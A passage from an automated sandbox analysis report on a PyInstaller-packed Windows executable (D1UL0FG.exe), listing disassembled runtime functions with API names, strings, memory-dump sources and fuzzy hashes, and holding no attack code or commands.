                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E91DF33A2CA4681F762AE28D45037D73A1AB44B94F444176DA9EC73E6DF3CE805A302
                                                                                                                                                                                                                                          Function 00007FF67AEEFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction ID: db7d6e1f5c1a643dc1519314539446ccaa9f6f0f31b074e72d4fdf170bbecf2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05819D33E2C24285F7646F2981503793BA0AB11B58FE580B5DA0DD72BADF2DF901E701
                                                                                                                                                                                                                                          Function 00007FF67AEDD6B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                          • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                          • Instruction ID: c74a6c1eb0b8eb6344ef07313ca52e52fd130f8db6193bf14769008e3a0f6bcc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4251C337B2B6428ADB15EF15E484A783795EB84B98F2041B4DA4D877A8EF3CE841D700
                                                                                                                                                                                                                                          Function 00007FF67AEDF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                          • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                          • Instruction ID: b3bb8f1faed0b69e03748649c3796e1feb07037086f257150ef2776c9b117dae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D051913392838286EB64EF21954436877A0FB95B98F289275DA5D877E9CF3CE850D700
                                                                                                                                                                                                                                          Function 00007FF67AEDEF48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                          • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                          • Instruction ID: 4d45a1bd54269c5c6fc4062e62b8a95757e7898f49d469dda6b1bc23e81ce9a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA619133918BC585E760EB15E4403AAB7A0FBC5B94F144269EB9C87BA9DF7CD190CB00
                                                                                                                                                                                                                                          Function 00007FF67AED7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,?,00007FF67AED352C,?,00000000,00007FF67AED3F23), ref: 00007FF67AED7F22
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateDirectory
                                                                                                                                                                                                                                          • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                          • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                          • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                          • Instruction ID: 23802568c6ccab5b5b1b57424590c5ade0ac70b5ce3517d4e6518026249558ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0331E622739AC149EA31AB20E8507EA6354EFC4BE4F541271EE6D877E9DF2CD641DB00
                                                                                                                                                                                                                                          Function 00007FF67AED2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                          • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                          • Instruction ID: 124081f46d344ce07242c9511651fcbb61625576befa83f9967deb589ebbf2e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A021AE73B28B8186E750AB64F8447EA63A4EB88780F404136EA8D97669DE3CD649D740
                                                                                                                                                                                                                                          Function 00007FF67AEEC610 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                                          • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                          • Instruction ID: 25cffcac6c308c1d911f80ef2d5985f7324c656dbe1a42ab008ba0bc66a79432
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBD13273B28A818AF710DF74D4402AC37B1FB84798B048276DE5E97BA9DE38D456D780
                                                                                                                                                                                                                                          Function 00007FF67AEEF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction ID: 10c56d16edc8ce774b309087459a0f5709734dadeac67502bc7988c8abfcf43d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1510473F2C2158AFB24EF6499616BC37A1AB40358F914279DE1ED2AF5DF38A4029700
                                                                                                                                                                                                                                          Function 00007FF67AEE57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                                                                                                          • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                          • Instruction ID: 4a3e458223fc3d5335aa9743605ae703e2afd08582acde6e135e2aecfd1f83b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01518F23E286418AFB10EFB1D4503BD23A1FB48B98F148579DE5D976A9DF38D441D720
                                                                                                                                                                                                                                          Function 00007FF67AED20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1956198572-0
                                                                                                                                                                                                                                          • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction ID: 3b3b8af1745ae865bf48ce2594468a64a44ccb6198796e99dc8e3b9130f0227a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B711A932B2C14282F654A769F64427A5252EFC4780F98C074DB4947BA9DD2DD8D5E600
                                                                                                                                                                                                                                          Function 00007FF67AEDD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                          • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                          • Instruction ID: 5599cfb3d23e029742ee504dcece9105c60dab53edeb8fa6f9d016d85c4cf59a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16114522B24B0ACAEB40DB60E8442A933A4FB19758F440E35EA6D867A4DF3CD1588340
                                                                                                                                                                                                                                          Function 00007FF67AEF5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                          • Instruction ID: 07ca307dfe24972e1085f23b7e02e2018b70b1bf25b10b42bbcecd75f8bde3c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA412813A2C78242FBA4AB25F40137A6790EBA0BA4F144279EE5D87AF5DF3DD541DB00
                                                                                                                                                                                                                                          Function 00007FF67AEE9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEE90B6
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF67AEDCC15), ref: 00007FF67AEE90D4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe, xrefs: 00007FF67AEE90C2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe
                                                                                                                                                                                                                                          • API String ID: 3580290477-1075608045
                                                                                                                                                                                                                                          • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                          • Instruction ID: 1eaa4b620d65d1167b525d564f01c72e049bd763d75ceb8213aeea71616cf9e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE417D73A2CB5286FB14EF25E8900BD63E4EF447D0B554075EA4E83BA5DE3DE8819340
                                                                                                                                                                                                                                          Function 00007FF67AEECCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
